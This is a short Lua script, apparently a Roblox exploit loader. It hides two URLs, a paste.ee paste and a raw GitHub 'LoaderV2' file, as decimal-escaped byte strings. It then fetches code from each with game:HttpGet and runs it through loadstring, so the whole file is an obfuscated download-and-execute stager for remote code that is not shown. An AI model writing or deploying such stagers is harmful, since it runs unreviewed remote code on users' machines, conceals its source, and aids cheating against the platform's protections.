local a = getfenv and getfenv() or _ENV
local b = a["loadstring"]
local c = a["game"]["HttpGet"]
local d = a["game"]

local function e(str)
    local f = {}
    for g in str:gmatch(".") do
        table.insert(f, "\\" .. string.byte(g))
    end
    return loadstring(game:HttpGet(loadstring("return \"" .. table.concat(f) .. "\"")()))
end

local u1 = "\104\116\116\112\115\58\47\47\112\97\115\116\101\46\101\101\47\114\47\103\108\112\80\112\111\77\111"
local u2 = "\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\122\104\117\101\120\120\47\86\111\119\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\76\111\97\100\101\114\86\50"

b(c(d, u1))()
b(c(d, u2))()
